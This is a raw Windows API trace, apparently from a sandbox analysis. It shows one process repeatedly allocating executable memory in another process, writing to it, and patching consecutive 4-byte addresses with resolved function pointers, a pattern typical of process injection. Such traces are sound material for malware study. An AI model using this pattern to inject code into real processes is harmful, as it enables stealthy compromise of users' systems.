	[0188.087] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.090] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x1284f8*=0x70) returned 1
	[0188.090] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.090] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.090] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.090] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0188.090] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.091] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.091] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.091] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.091] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.091] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.091] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.091] ResetEvent (hEvent=0x478) returned 1
	[0188.091] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.092] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.092] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.092] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.092] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100552dc, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.092] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.093] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.093] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.093] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.093] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.093] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.093] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.094] ResetEvent (hEvent=0x478) returned 1
	[0188.094] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.094] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.094] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.094] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.094] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100552e0, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.094] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.095] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.095] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.095] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.095] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.095] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.095] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.095] ResetEvent (hEvent=0x478) returned 1
	[0188.095] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.096] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.096] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.096] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.096] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100552e4, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.096] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.096] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.096] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.096] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.097] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.097] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.097] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.097] ResetEvent (hEvent=0x478) returned 1
	[0188.097] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.097] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.098] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.098] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.098] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100552e8, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.098] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.098] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.098] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.099] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.099] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.099] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.099] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.099] ResetEvent (hEvent=0x478) returned 1
	[0188.099] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.099] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.100] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.100] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.100] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100552ec, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.100] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.100] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.100] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.100] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.100] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.101] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.101] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.101] ResetEvent (hEvent=0x478) returned 1
	[0188.101] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.102] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.102] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.102] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.102] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100552f0, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.103] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.103] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.103] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.103] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.103] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.103] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.103] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.104] ResetEvent (hEvent=0x478) returned 1
	[0188.104] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.104] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.104] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.104] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.104] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100552f4, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.105] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.105] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.105] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.105] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.105] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.105] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.106] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.106] ResetEvent (hEvent=0x478) returned 1
	[0188.106] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.106] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.106] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.106] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.106] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100552f8, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.107] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.107] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.107] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.107] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.107] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.107] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.107] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.108] ResetEvent (hEvent=0x478) returned 1
	[0188.108] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.108] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.108] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.108] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.108] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100552fc, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.109] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.109] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.109] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.109] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.109] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.109] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.109] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.110] ResetEvent (hEvent=0x478) returned 1
	[0188.110] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.110] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.110] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.110] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.110] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055300, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.111] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.111] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.111] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.111] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.111] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.111] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.111] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.112] ResetEvent (hEvent=0x478) returned 1
	[0188.112] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.112] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.112] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.112] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.112] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055304, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.113] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.113] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.113] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.113] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.113] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.114] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.114] ResetEvent (hEvent=0x478) returned 1
	[0188.114] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.114] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.114] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.114] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.114] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055308, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.115] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.115] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.115] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.115] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.115] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.115] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.116] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.116] ResetEvent (hEvent=0x478) returned 1
	[0188.116] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.116] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.116] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.116] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.116] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005530c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
